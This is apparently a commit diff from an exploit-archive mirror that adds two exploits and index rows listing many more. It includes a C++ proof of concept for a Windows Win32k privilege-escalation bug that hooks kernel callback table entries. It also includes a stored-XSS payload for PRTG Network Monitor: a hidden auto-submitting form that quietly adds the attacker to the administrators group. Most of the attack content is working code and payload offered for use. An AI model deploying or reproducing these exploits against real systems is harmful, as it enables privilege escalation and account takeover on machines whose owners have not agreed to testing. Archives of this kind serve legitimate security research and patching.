||||
NOMBRE_INICIO_SERVICIO: LocalSystem
|
||||
|
||||
#Exploit:
|
||||
|
||||
A successful attempt would require the local user to be able to insert
|
||||
their code in the system root path undetected by the OS or other security
|
||||
applications where it could potentially be executed during application
|
||||
startup or reboot. If successful, the local user's code would execute with
|
||||
the elevated privileges of the application.
|
113
exploits/windows/local/49179.cpp
Normal file
113
exploits/windows/local/49179.cpp
Normal file
|
@ -0,0 +1,113 @@
|
|||
# Exploit Title: Microsoft Windows - Win32k Elevation of Privilege
|
||||
# Author: nu11secur1ty
|
||||
# Date: 08.03.2020
|
||||
# Exploit Date: 01/14/2020
|
||||
# Vendor: Microsoft
|
||||
# Software Link: https://support.microsoft.com/en-us/help/3095649/win32k-sys-update-in-windows-october-2015
|
||||
# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/raw/master/Undefined/CVE-2020-0624/win32k/__32-win32k.sys5.1.2600.1330.zip
|
||||
# CVE: CVE-2020-0642
|
||||
|
||||
[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
|
||||
[+] Source: readme from GitHUB
|
||||
|
||||
[Exploit Program Code]
|
||||
|
||||
// cve-2020-0624.cpp
|
||||
|
||||
#pragma warning(disable: 4005)
|
||||
#pragma warning(disable: 4054)
|
||||
#pragma warning(disable: 4152)
|
||||
#pragma warning(disable: 4201)
|
||||
|
||||
#include <Windows.h>
|
||||
#include "ntos.h"
|
||||
|
||||
typedef NTSTATUS(NTAPI* PFNUSER32CALLBACK)(PVOID);
|
||||
|
||||
HWND hParent{}, hChild{};
|
||||
BOOL Flag1{}, Flag2{};
|
||||
|
||||
PFNUSER32CALLBACK OrgCCI2{}, OrgCCI3{};
|
||||
|
||||
NTSTATUS NTAPI NewCCI2(PVOID Param)
|
||||
{
|
||||
if (Flag1)
|
||||
{
|
||||
Flag1 = FALSE;
|
||||
Flag2 = TRUE;
|
||||
DestroyWindow(hParent);
|
||||
}
|
||||
return OrgCCI2(Param);
|
||||
}
|
||||
NTSTATUS NTAPI NewCCI3(PVOID Param)
|
||||
{
|
||||
if (Flag2)
|
||||
{
|
||||
ExitThread(0);
|
||||
}
|
||||
return OrgCCI3(Param);
|
||||
}
|
||||
int main()
|
||||
{
|
||||
DWORD OldProtect{};
|
||||
|
||||
PTEB teb = NtCurrentTeb();
|
||||
PPEB peb = teb->ProcessEnvironmentBlock;
|
||||
PVOID pCCI2 = &((PVOID*)peb->KernelCallbackTable)[2];
|
||||
if (!VirtualProtect(pCCI2, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect))
|
||||
return 0;
|
||||
OrgCCI2 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI2,
|
||||
&NewCCI2);
|
||||
|
||||
PVOID pCCI3 = &((PVOID*)peb->KernelCallbackTable)[3];
|
||||
if (!VirtualProtect(pCCI3, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect))
|
||||
return 0;
|
||||
OrgCCI3 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI3,
|
||||
&NewCCI3);
|
||||
|
||||
hParent = CreateWindow(L"ScrollBar", L"Parent", WS_OVERLAPPEDWINDOW,
|
||||
CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, NULL, NULL, NULL);
|
||||
hChild = CreateWindow(L"ScrollBar", L"Child", WS_OVERLAPPEDWINDOW |
|
||||
WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, 0, NULL,
|
||||
NULL);
|
||||
Flag1 = TRUE;
|
||||
SendMessage(hChild, WM_LBUTTONDOWN, 0, 0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
[Vendor]
|
||||
Microsoft
|
||||
|
||||
|
||||
[Vulnerability Type]
|
||||
Privilege Escalation
|
||||
|
||||
|
||||
[Description]
|
||||
The entry creation date may reflect when the CVE ID was allocated or
|
||||
reserved, and does not necessarily indicate when this vulnerability
|
||||
was discovered, shared with the affected vendor, publicly disclosed,
|
||||
or updated in CVE.
|
||||
- - - more: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0642
|
||||
|
||||
[Disclosure Timeline]
|
||||
An elevation of privilege vulnerability exists in Windows when the
|
||||
Win32k component fails to properly handle objects in memory. An
|
||||
attacker who successfully exploited this vulnerability could run
|
||||
arbitrary code in kernel mode. An attacker could then install
|
||||
programs; view, change, or delete data; or create new accounts with
|
||||
full user rights.
|
||||
To exploit this vulnerability, an attacker would first have to log on
|
||||
to the system. An attacker could then run a specially crafted
|
||||
application that could exploit the vulnerability and take control of
|
||||
an affected system.
|
||||
The update addresses this vulnerability by correcting how Win32k
|
||||
handles objects in memory.
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The entry creation date may reflect when the CVE ID was allocated or
|
||||
reserved, and does not necessarily indicate when this vulnerability
|
||||
was discovered, shared with the affected vendor, publicly disclosed,
|
||||
or updated in CVE.
|
33
exploits/windows/webapps/49156.txt
Normal file
33
exploits/windows/webapps/49156.txt
Normal file
|
@ -0,0 +1,33 @@
|
|||
# Exploit Title: PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS
|
||||
# Date: 2/12/2020
|
||||
# Exploit Author: Amin Rawah
|
||||
# Vendor Homepage: https://www.paessler.com/prtg
|
||||
# Software Link: https://www.paessler.com/prtg
|
||||
# Version: 20.4.63.1412 x64
|
||||
# Tested on: Windows
|
||||
# CVE : CVE-2020-14073
|
||||
|
||||
Description:
|
||||
Since there is a stored XSS affecting 'maps' in the system, a malicious user can escalte his/her privilege to PRTG Administrator.
|
||||
|
||||
Steps:
|
||||
1- Login to PRTG system and view source code (currentUserId)
|
||||
2- Create a map, add an element, double click the element and modify the HTML section 'HTML After'
|
||||
3- In 'HTML After' add the following code:
|
||||
<form action="http://<PRTG_SERVER>:8081/editsettings" method="POST" enctype="multipart/form-data">
|
||||
<input type="hidden" name="name_" value="PRTG Administrators" />
|
||||
<input type="hidden" name="defaulthome_" value="/welcome.htm" />
|
||||
<input type="hidden" name="isadgroup" value="0" />
|
||||
<input type="hidden" name="adusertype_" value="0" />
|
||||
<input type="hidden" name="aduserack_" value="0" />
|
||||
<input type="hidden" name="users_" value="1" />
|
||||
<input type="hidden" name="users_" value="1" />
|
||||
<input type="hidden" name="users__check" value="<currentUserId>|<YOUR_USERNAME>|" />
|
||||
<input type="hidden" name="users__check" value="100|PRTG System Administrator|" />
|
||||
<input type="hidden" name="id" value="200" />
|
||||
<input type="hidden" name="targeturl" value="/systemsetup.htm?tabid=6" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
<svg/onload='document.forms[0].submit()'/>
|
||||
4- Save and share the link with PRTG Administrator.
|
||||
5- Login with the highest privilege.
|
|
@ -11216,6 +11216,9 @@ id,file,description,date,author,type,platform,port
|
|||
49142,exploits/windows/local/49142.txt,"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path",2020-12-01,"Emmanuel Lujan",local,windows,
|
||||
49143,exploits/windows/local/49143.txt,"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path",2020-12-01,Jok3r,local,windows,
|
||||
49144,exploits/windows/local/49144.bat,"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path",2020-12-01,"Metin Yunus Kandemir",local,windows,
|
||||
49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,
|
||||
49157,exploits/windows/local/49157.txt,"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
|
||||
49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -18319,6 +18322,8 @@ id,file,description,date,author,type,platform,port
|
|||
49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,
|
||||
49106,exploits/windows/remote/49106.py,"Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution",2020-11-26,"Loke Hui Yi",remote,windows,
|
||||
49127,exploits/windows/remote/49127.py,"YATinyWinFTP - Denial of Service (PoC)",2020-11-30,strider,remote,windows,
|
||||
49169,exploits/multiple/remote/49169.sh,"Ksix Zigbee Devices - Playback Protection Bypass (PoC)",2020-12-02,"Alejandro Vazquez Vazquez",remote,multiple,
|
||||
49176,exploits/linux/remote/49176.txt,"Mitel mitel-cs018 - Call Data Information Disclosure",2020-12-02,"Andrea Intilangelo",remote,linux,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -43367,3 +43372,30 @@ id,file,description,date,author,type,platform,port
|
|||
49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020",2020-12-01,"Matthew Aberegg",webapps,php,
|
||||
49140,exploits/php/webapps/49140.txt,"Social Networking Site - Authentication Bypass (SQli)",2020-12-01,gh1mau,webapps,php,
|
||||
49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,
|
||||
49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,
|
||||
49148,exploits/multiple/webapps/49148.txt,"ILIAS Learning Management System 4.3 - SSRF",2020-12-02,Dot,webapps,multiple,
|
||||
49149,exploits/php/webapps/49149.txt,"Pharmacy Store Management System 1.0 - 'id' SQL Injection",2020-12-02,"Aydın Baran Ertemir",webapps,php,
|
||||
49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,
|
||||
49151,exploits/multiple/webapps/49151.txt,"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF",2020-12-02,"Hardik Solanki",webapps,multiple,
|
||||
49152,exploits/multiple/webapps/49152.txt,"Student Result Management System 1.0 - Authentication Bypass SQL Injection",2020-12-02,"Ritesh Gohil",webapps,multiple,
|
||||
49153,exploits/multiple/webapps/49153.txt,"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting",2020-12-02,"Soushikta Chowdhury",webapps,multiple,
|
||||
49154,exploits/php/webapps/49154.py,"WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution",2020-12-02,zetc0de,webapps,php,
|
||||
49155,exploits/php/webapps/49155.py,"WonderCMS 3.1.3 - Authenticated Remote Code Execution",2020-12-02,zetc0de,webapps,php,
|
||||
49156,exploits/windows/webapps/49156.txt,"PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS",2020-12-02,"Amin Rawah",webapps,windows,
|
||||
49159,exploits/multiple/webapps/49159.txt,"Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting",2020-12-02,"Sagar Banwa",webapps,multiple,
|
||||
49160,exploits/multiple/webapps/49160.txt,"NewsLister - Authenticated Persistent Cross-Site Scripting",2020-12-02,"Emre Aslan",webapps,multiple,
|
||||
49161,exploits/multiple/webapps/49161.txt,"Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting",2020-12-02,"Parshwa Bhavsar",webapps,multiple,
|
||||
49162,exploits/multiple/webapps/49162.txt,"Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting",2020-12-02,"Parshwa Bhavsar",webapps,multiple,
|
||||
49163,exploits/multiple/webapps/49163.txt,"Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass",2020-12-02,"Aditya Wakhlu",webapps,multiple,
|
||||
49164,exploits/php/webapps/49164.txt,"WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting",2020-12-02,"Hemant Patidar",webapps,php,
|
||||
49166,exploits/multiple/webapps/49166.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
|
||||
49167,exploits/multiple/webapps/49167.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
|
||||
49168,exploits/multiple/webapps/49168.txt,"DotCMS 20.11 - Stored Cross-Site Scripting",2020-12-02,"Hardik Solanki",webapps,multiple,
|
||||
49170,exploits/multiple/webapps/49170.txt,"WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass",2020-12-02,"Aakash Madaan",webapps,multiple,
|
||||
49171,exploits/multiple/webapps/49171.txt,"ChurchCRM 4.2.0 - CSV/Formula Injection",2020-12-02,"Mufaddal Masalawala",webapps,multiple,
|
||||
49172,exploits/multiple/webapps/49172.txt,"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)",2020-12-02,"Mufaddal Masalawala",webapps,multiple,
|
||||
49173,exploits/php/webapps/49173.txt,"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality",2020-12-02,"Mufaddal Masalawala",webapps,php,
|
||||
49174,exploits/php/webapps/49174.txt,"Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover",2020-12-02,"Mufaddal Masalawala",webapps,php,
|
||||
49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
|
||||
49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
|
||||
49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue